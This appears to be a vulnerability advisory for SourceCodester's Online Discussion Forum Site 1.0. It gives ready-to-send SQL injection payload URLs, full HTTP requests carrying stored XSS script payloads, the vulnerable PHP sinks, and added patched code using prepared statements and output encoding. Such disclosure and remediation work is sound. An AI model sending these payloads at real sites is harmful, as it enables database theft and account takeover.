CVE-2023-3146: Vulnerability/Online Discussion Forum Site - multiple vulnerabilities.md at main · Peanut886/Vulnerability
A vulnerability, which was classified as critical, was found in SourceCodester Online Discussion Forum Site 1.0. This affects an unknown part of the file admin\categories\manage_category.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-231015.
**Exploit Title: Online Discussion Forum Site - multiple vulnerabilities**

**Date: 2023-06/07**

**Exploit Author: Peanut886**

**Vendor Homepage: https://www.sourcecodester.com**

**Software Link: https://www.sourcecodester.com/download-code?nid=15337&title=Online+Discussion+Forum+Site+in+PHP%2FOOP+Free+Source+Code**

**Version: 1.0**

**Tested on: Windows 10 + phpstudy**

**1. SQL injection vulnerability in posts\view_post.php**
Sample request PoC #1

```
http://odfs.com/?p=posts/view_post&id=1%27%20OR%20(SELECT%205314%20FROM(SELECT%20COUNT(*),CONCAT(0x71627a6a71,(SELECT%20(ELT(5314=5314,1))),0x7176787a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27wAaE%27=%27wAaE
```
Sqlmap running results #1
Related code: posts\view_post.php

```php
<?php
if(isset($_GET['id'])){
    // $_GET['id'] is interpolated straight into the SQL string (PoC #1 targets this)
    $qry = $conn->query("SELECT p.*, u.username, u.avatar, c.name as `category` FROM `post_list` p inner join category_list c on p.category_id = c.id inner join `users` u on p.user_id = u.id where p.id= '{$_GET['id']}'");
    if($qry->num_rows > 0){
        foreach($qry->fetch_array() as $k => $v){
            if(!is_numeric($k)){
                $$k = $v;   // every column becomes a local variable ($title, $content, ...)
            }
        }
    }else{
        echo '<script> alert("Post ID is not recognized."); location.replace("./p=posts");</script>';
    }
}else{
    echo '<script> alert("Post ID is required"); location.replace("./p=posts");</script>';
}
?>
```
**2. SQL injection vulnerability in user\manage_user.php**
Sample request PoC #2

```
http://odfs.com/?p=user/manage_user&id=1%27%20OR%20(SELECT%206959%20FROM(SELECT%20COUNT(*),CONCAT(0x71627a6a71,(SELECT%20(ELT(6959=6959,1))),0x716b766b71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27xbbY%27=%27xbbY
```
Sqlmap running results #2
Related code: user\manage_user.php

```php
<?php
if(isset($_GET['id'])){
    // unescaped $_GET['id'] inside the WHERE clause (PoC #2 targets this)
    $user = $conn->query("SELECT * FROM users where id ='{$_GET['id']}' ");
    foreach($user->fetch_array() as $k =>$v){
        $meta[$k] = $v;
    }
}
?>
```
**3. SQL injection vulnerability in posts\manage_post.php**
Sample request PoC #3 (time-based blind, 5 second delay)

```
http://odfs.com/?p=posts/manage_post&id=1%27%20AND%20(SELECT%201667%20FROM%20(SELECT(SLEEP(5)))KDHo)%20AND%20%27yeqR%27=%27yeqR
```
Sqlmap running results #3
Related code: posts\manage_post.php

```php
<?php
if(isset($_GET['id'])){
    // the user_id condition only restricts the row to the logged-in user;
    // $_GET['id'] is still interpolated unescaped (PoC #3 targets this)
    $qry = $conn->query("SELECT * FROM `post_list` where id= '{$_GET['id']}' and user_id = '{$_settings->userdata('id')}'");
    if($qry->num_rows > 0){
        foreach($qry->fetch_array() as $k => $v){
            if(!is_numeric($k)){
                $$k = $v;
            }
        }
    }
}
?>
```
**4. SQL injection vulnerability in admin\user\manage_user.php**
Sample request PoC #4

```
http://odfs.com/?p=admin/user/manage_user&id=1%27%20OR%20(SELECT%204186%20FROM(SELECT%20COUNT(*),CONCAT(0x71766b6a71,(SELECT%20(ELT(4186=4186,1))),0x71786b7a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27RAfl%27=%27RAfl
```
Sqlmap running results #4
Related code: admin\user\manage_user.php

```php
<?php
if(isset($_GET['id'])){
    // same pattern as user\manage_user.php, reachable from the admin area (PoC #4)
    $user = $conn->query("SELECT * FROM users where id ='{$_GET['id']}' ");
    foreach($user->fetch_array() as $k =>$v){
        $meta[$k] = $v;
    }
}
?>
```
**5. SQL injection vulnerability in admin\posts\view_post.php**
Sample request PoC #5

```
http://odfs.com/?p=admin/posts/view_post&id=1%27%20OR%20(SELECT%203303%20FROM(SELECT%20COUNT(*),CONCAT(0x7162627671,(SELECT%20(ELT(3303=3303,1))),0x716a6a7871,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27DgHr%27=%27DgHr
```
Sqlmap running results #5
Related code: admin\posts\view_post.php

```php
<?php
if(isset($_GET['id'])){
    // identical to posts\view_post.php: $_GET['id'] interpolated unescaped (PoC #5)
    $qry = $conn->query("SELECT p.*, u.username, u.avatar, c.name as `category` FROM `post_list` p inner join category_list c on p.category_id = c.id inner join `users` u on p.user_id = u.id where p.id= '{$_GET['id']}'");
    if($qry->num_rows > 0){
        foreach($qry->fetch_array() as $k => $v){
            if(!is_numeric($k)){
                $$k = $v;
            }
        }
    }else{
        echo '<script> alert("Post ID is not recognized."); location.replace("./p=posts");</script>';
    }
}else{
    echo '<script> alert("Post ID is required"); location.replace("./p=posts");</script>';
}
?>
```
**6. SQL injection vulnerability in admin\posts\manage_post.php**
Sample request PoC #6

```
http://odfs.com/?p=admin/posts/manage_post&id=1%27%20OR%20(SELECT%206705%20FROM(SELECT%20COUNT(*),CONCAT(0x7162716a71,(SELECT%20(ELT(6705=6705,1))),0x7162706a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27xWgO%27=%27xWgO
```
Sqlmap running results #6
Related code: admin\posts\manage_post.php

```php
<?php
if(isset($_GET['id'])){
    // no user_id restriction in the admin variant; $_GET['id'] interpolated unescaped (PoC #6)
    $qry = $conn->query("SELECT * FROM `post_list` where id= '{$_GET['id']}' ");
    if($qry->num_rows > 0){
        foreach($qry->fetch_array() as $k => $v){
            if(!is_numeric($k)){
                $$k = $v;   // $title and $content used by the form below come from here
            }
        }
    }
}
?>
```
**7. SQL injection vulnerability in admin\categories\view_category.php**
Sample request PoC #7 (the script is called directly, outside the `?p=` router; `id` is the injectable parameter)

```http
GET /admin/categories/view_category.php?id=4 HTTP/1.1
Host: odfs.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://odfs.com/admin/?page=categories
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hbfgm77d947f3hrk84gd6u9r8s
Connection: close
```
Sqlmap running results #7
Related code: admin\categories\view_category.php

```php
<?php
require_once('../../config.php');
// `$_GET['id'] > 0` is a numeric comparison, not a type check: a payload that
// starts with a positive digit (e.g. 4' OR ...) still passes it
if(isset($_GET['id']) && $_GET['id'] > 0){
    $qry = $conn->query("SELECT * from `category_list` where id = '{$_GET['id']}' ");
    if($qry->num_rows > 0){
        foreach($qry->fetch_assoc() as $k => $v){
            $$k=$v;
        }
    }
}
?>
```
**8. SQL injection vulnerability in admin\categories\manage_category.php** (CVE-2023-3146)
Sample request PoC #8

```http
GET /admin/categories/manage_category.php?id=4 HTTP/1.1
Host: odfs.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://odfs.com/admin/?page=categories
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hbfgm77d947f3hrk84gd6u9r8s
Connection: close
```
Sqlmap running results #8
Related code: admin\categories\manage_category.php

```php
<?php
require_once('../../config.php');
// same ineffective `> 0` guard as view_category.php, then unescaped interpolation
if(isset($_GET['id']) && $_GET['id'] > 0){
    $qry = $conn->query("SELECT * from `category_list` where id = '{$_GET['id']}' ");
    if($qry->num_rows > 0){
        foreach($qry->fetch_assoc() as $k => $v){
            $$k=$v;
        }
    }
}
?>
```
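Sections 1 to 8 share one defect: `$_GET['id']` is interpolated into the SQL string. The `$_GET['id'] > 0` guard in sections 7 and 8 does not change that, because PHP evaluates `"4' OR 1=1" > 0` as true (PHP 7 converts the leading-numeric string to 4; PHP 8 compares it as a string against `"0"`), so any payload that begins with a positive digit reaches the query. The block below is an added example, not code from this advisory or from the SourceCodester project: a hardened replacement for the `id` lookup that validates the parameter as an integer and binds it with a prepared statement. It assumes the project's `$conn` mysqli handle and the table names quoted above; the `./?p=posts` redirect target is assumed from the `?p=` routing visible in the PoC URLs. For the `manage_post.php` variants (sections 3 and 6) the session user id is bound the same way with a second `i` placeholder.

```php
<?php
// Added example (not part of the advisory or the SourceCodester project):
// hardened replacement for the `id` lookups in sections 1-8.
// Assumes the project's existing mysqli connection `$conn` and the
// `post_list` / `category_list` / `users` tables quoted in the advisory.
declare(strict_types=1);

/**
 * Parse the `id` query parameter as a positive integer, or return null.
 * Unlike `$_GET['id'] > 0`, FILTER_VALIDATE_INT rejects "4' OR 1=1" outright.
 */
function post_id_from_request(array $get): ?int
{
    if (!isset($get['id'])) {
        return null;
    }
    $id = filter_var($get['id'], FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/**
 * Fetch one post by id with a bound integer parameter instead of string
 * interpolation. Returns the row as an associative array, or null.
 * get_result() needs the mysqlnd driver, which is the default on PHP 7+.
 */
function fetch_post(mysqli $conn, int $id): ?array
{
    $sql = 'SELECT p.*, u.username, u.avatar, c.name AS `category`
            FROM `post_list` p
            INNER JOIN `category_list` c ON p.category_id = c.id
            INNER JOIN `users` u ON p.user_id = u.id
            WHERE p.id = ?';
    $stmt = $conn->prepare($sql);
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Usage in place of the original posts/view_post.php block. The redirect
// target `./?p=posts` is assumed from the `?p=` routing seen in the PoC URLs.
$id = post_id_from_request($_GET);
if ($id === null) {
    echo '<script>alert("Post ID is required"); location.replace("./?p=posts");</script>';
    exit;
}
$post = fetch_post($conn, $id);
if ($post === null) {
    echo '<script>alert("Post ID is not recognized."); location.replace("./?p=posts");</script>';
    exit;
}
// Keep the row in one array ($post['title'], $post['content']) instead of
// `$$k = $v`, which turns every column name into a local variable and lets a
// column that happens to share a name with an existing variable overwrite it.
```

The integer validation is defence in depth; the prepared statement is the actual fix, since it keeps the value out of the SQL text whatever the parser accepted. The same two functions, with `category_list` as the table, replace the lookups in sections 7 and 8.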
**9. SQL injection vulnerability in classes\Users.php (POST)**
Sample request PoC #9 (the `username` and `id` form fields are the injectable parameters)

```http
POST /classes/Users.php?f=registration HTTP/1.1
Host: odfs.com
Content-Length: 857
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWVcezwGAZd9UURw7
Origin: http://odfs.com
Referer: http://odfs.com/register.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hbfgm77d947f3hrk84gd6u9r8s
Connection: close

------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="id"


------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="type"

2
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="firstname"

1
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="middlename"

22
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="lastname"

33
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="username"

123
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="password"

321
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryWVcezwGAZd9UURw7--
```
Sqlmap running results #9
Related code: classes\Users.php (POST)

```php
function registration(){
    if(!empty($_POST['password']))
        $_POST['password'] = md5($_POST['password']);
    else
        unset($_POST['password']);
    extract($_POST);   // every POST key becomes a local variable, including $username and $id
    $data = "";
    // $username and $id are concatenated into the query unescaped (PoC #9 targets this)
    $check = $this->conn->query("SELECT * FROM `users` where username = '{$username}' ".($id > 0 ? " and id!='{$id}'" : "")." ")->num_rows;
    if($check > 0){
        $resp['status'] = 'failed';
        $resp['msg'] = 'Username already exists.';
        return json_encode($resp);
    }
    // ... (remainder of registration() not reproduced in the advisory)
}
```
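The registration handler has two problems that the GET-based findings do not: `extract($_POST)` lets the client define any local variable before the query is built (`$id` included, which is how the `and id!='{$id}'` branch becomes reachable from a registration form), and the WHERE clause is assembled by string concatenation. The block below is an added example, not code from this advisory or from the SourceCodester project: a rewrite of the duplicate-username check and the insert that reads each field by name and binds every value. It assumes the project's mysqli handle in `$this->conn`, a `users` table whose columns match the form fields in the PoC request (`firstname`, `middlename`, `lastname`, `username`, `password`, `type`), and that the `type` value for self-registered accounts (2 in the PoC) is fixed server-side rather than taken from the client.

```php
<?php
// Added example (not part of the advisory or the SourceCodester project):
// a rewrite of the duplicate-username check and insert from
// classes/Users.php registration() that never interpolates request data.
// Assumes the project's mysqli handle in $this->conn and a `users` table
// whose columns match the PoC form fields.
declare(strict_types=1);

final class UserRegistration
{
    // Assumed: the account type for self-registered users (the PoC sends
    // type=2). It is set here, server-side; the client must not choose it.
    private const SELF_REGISTERED_TYPE = 2;

    private mysqli $conn;

    public function __construct(mysqli $conn)
    {
        $this->conn = $conn;
    }

    /**
     * True when another account already uses $username. $excludeId is the
     * account being edited (null for a new registration); it replaces the
     * original's `($id > 0 ? " and id!='{$id}'" : "")` string building with
     * two fixed statements.
     */
    public function usernameTaken(string $username, ?int $excludeId): bool
    {
        if ($excludeId === null) {
            $stmt = $this->conn->prepare('SELECT 1 FROM `users` WHERE `username` = ? LIMIT 1');
            $stmt->bind_param('s', $username);
        } else {
            $stmt = $this->conn->prepare('SELECT 1 FROM `users` WHERE `username` = ? AND `id` != ? LIMIT 1');
            $stmt->bind_param('si', $username, $excludeId);
        }
        $stmt->execute();
        $taken = $stmt->get_result()->num_rows > 0;
        $stmt->close();
        return $taken;
    }

    /** Handles the registration POST; returns the JSON reply the front end expects. */
    public function registration(array $post): string
    {
        // Read every field by name. extract($_POST) in the original turns any
        // posted key into a local variable, so the client can also set $id or
        // $data before the query runs. A registration always creates a new
        // account, so the `id` field is deliberately not read here.
        $first    = trim((string)($post['firstname'] ?? ''));
        $middle   = trim((string)($post['middlename'] ?? ''));
        $last     = trim((string)($post['lastname'] ?? ''));
        $username = trim((string)($post['username'] ?? ''));
        $password = (string)($post['password'] ?? '');

        if ($username === '' || $password === '') {
            return json_encode(['status' => 'failed', 'msg' => 'Username and password are required.']);
        }
        if ($this->usernameTaken($username, null)) {
            return json_encode(['status' => 'failed', 'msg' => 'Username already exists.']);
        }

        // The original stores md5($password); password_hash() gives a salted, slow hash.
        $hash = password_hash($password, PASSWORD_DEFAULT);
        $type = self::SELF_REGISTERED_TYPE;   // bind_param needs a variable, not a constant

        $stmt = $this->conn->prepare(
            'INSERT INTO `users` (`firstname`, `middlename`, `lastname`, `username`, `password`, `type`)
             VALUES (?, ?, ?, ?, ?, ?)'
        );
        $stmt->bind_param('sssssi', $first, $middle, $last, $username, $hash, $type);
        $stmt->execute();
        $stmt->close();

        return json_encode(['status' => 'success']);
    }
}
```

`usernameTaken()` keeps the `$excludeId` branch so an account-edit handler can reuse it; the registration path itself never passes an id, which is what removes the `$id` injection point the PoC exercises.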
**10. XSS vulnerability in admin\posts\manage_post.php (title)**
Sample request PoC #10 (the payload is stored through the post-save endpoint and rendered later in the admin edit form)

```http
POST /classes/Master.php?f=save_post HTTP/1.1
Host: odfs.com
Content-Length: 602
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywn2OqIAtW9RRog2w
Origin: http://odfs.com
Referer: http://odfs.com/?p=posts/manage_post
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hbfgm77d947f3hrk84gd6u9r8s
Connection: close

------WebKitFormBoundarywn2OqIAtW9RRog2w
Content-Disposition: form-data; name="id"


------WebKitFormBoundarywn2OqIAtW9RRog2w
Content-Disposition: form-data; name="title"

11<script>alert(111)</script>
------WebKitFormBoundarywn2OqIAtW9RRog2w
Content-Disposition: form-data; name="category_id"

4
------WebKitFormBoundarywn2OqIAtW9RRog2w
Content-Disposition: form-data; name="content"

<p>asd</p>
------WebKitFormBoundarywn2OqIAtW9RRog2w
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarywn2OqIAtW9RRog2w--
```
Sample response results #10
Related code: admin\posts\manage_post.php (title)

```html
<div class="form-group">
    <label for="title" class="control-label">Title</label>
    <!-- $title comes from `$$k = $v` above and is echoed into the attribute without encoding -->
    <input type="text" class="form-control rounded-0" name="title" id="title" value="<?= isset($title) ? $title : "" ?>">
</div>
```
**11. XSS vulnerability in admin\posts\manage_post.php (content)**
Sample request PoC #11

```http
POST /classes/Master.php?f=save_post HTTP/1.1
Host: odfs.com
Content-Length: 605
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTTVOK61sOtujLolB
Origin: http://odfs.com
Referer: http://odfs.com/?p=posts/manage_post
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hbfgm77d947f3hrk84gd6u9r8s
Connection: close

------WebKitFormBoundaryTTVOK61sOtujLolB
Content-Disposition: form-data; name="id"


------WebKitFormBoundaryTTVOK61sOtujLolB
Content-Disposition: form-data; name="title"

111
------WebKitFormBoundaryTTVOK61sOtujLolB
Content-Disposition: form-data; name="category_id"

4
------WebKitFormBoundaryTTVOK61sOtujLolB
Content-Disposition: form-data; name="content"

<script>alert(123)</script>
------WebKitFormBoundaryTTVOK61sOtujLolB
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryTTVOK61sOtujLolB--
```
Sample response results #11
Related code: admin\posts\manage_post.php (content)

```html
<div class="form-group">
    <label for="content" class="control-label">Content</label>
    <!-- $content is echoed into the textarea without encoding -->
    <textarea type="text" class="form-control rounded-0" name="content" id="content"><?= isset($content) ? $content : "" ?></textarea>
</div>
```
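Both XSS findings are stored: the PoC submits the payload through the public `save_post` endpoint (the Referer is the user-facing `?p=posts/manage_post` form), and the sink shown is the admin edit form, where `$$k = $v` hands the stored `title` and `content` columns straight to the template. Two context details matter for the sinks shown. The `title` lands inside a double-quoted `value` attribute, so a `"` is enough to break out even without a `<script>` tag. The `content` lands inside a `<textarea>`, where raw `<script>` is inert text; a payload aimed at that element has to emit `</textarea>` first. The block below is an added example, not code from this advisory or from the SourceCodester project: an output-encoding helper and a rendering of the same two form fields with it applied, exercised against constructed inputs that mirror the two PoC requests plus the textarea break-out.

```php
<?php
// Added example (not part of the advisory or the SourceCodester project):
// output encoding for the two sinks in sections 10 and 11, the `title`
// attribute value and the `content` textarea in admin/posts/manage_post.php.
declare(strict_types=1);

/** Encode a value for insertion into HTML text content or a quoted attribute. */
function h(?string $value): string
{
    // ENT_QUOTES covers both quote styles (attribute context), ENT_SUBSTITUTE
    // keeps invalid UTF-8 from silently turning the output into an empty string.
    return htmlspecialchars((string)$value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Render the edit-form fields from sections 10 and 11 with both values encoded. */
function render_post_form(?string $title, ?string $content): string
{
    return '<div class="form-group">'
        . '<label for="title" class="control-label">Title</label>'
        . '<input type="text" class="form-control rounded-0" name="title" id="title" value="' . h($title) . '">'
        . '</div>'
        . '<div class="form-group">'
        . '<label for="content" class="control-label">Content</label>'
        . '<textarea class="form-control rounded-0" name="content" id="content">' . h($content) . '</textarea>'
        . '</div>';
}

// Constructed inputs (not from the advisory's screenshots): the two PoC
// payloads, an attribute break-out for the title sink, and a textarea
// break-out for the content sink.
$samples = [
    '11<script>alert(111)</script>',              // section 10 payload, lands in value="..."
    '<script>alert(123)</script>',                // section 11 payload, inert inside <textarea> as-is
    '" autofocus onfocus="alert(1)',              // escapes the value attribute without any tag
    '</textarea><script>alert(1)</script>',       // escapes the textarea
];
foreach ($samples as $s) {
    echo render_post_form($s, $s), "\n";
}
// With h() applied, every <, >, " and ' is emitted as an entity, so none of
// the four samples closes the attribute or the textarea.
```

Encoding is the right treatment for the edit form, where the stored text should reappear exactly as typed. If `content` is meant to be rich text and is rendered as HTML on the viewing pages (the PoC sends `<p>asd</p>`), that output path needs an allow-list HTML sanitizer rather than entity encoding; the edit-form sinks above are fixed by encoding alone.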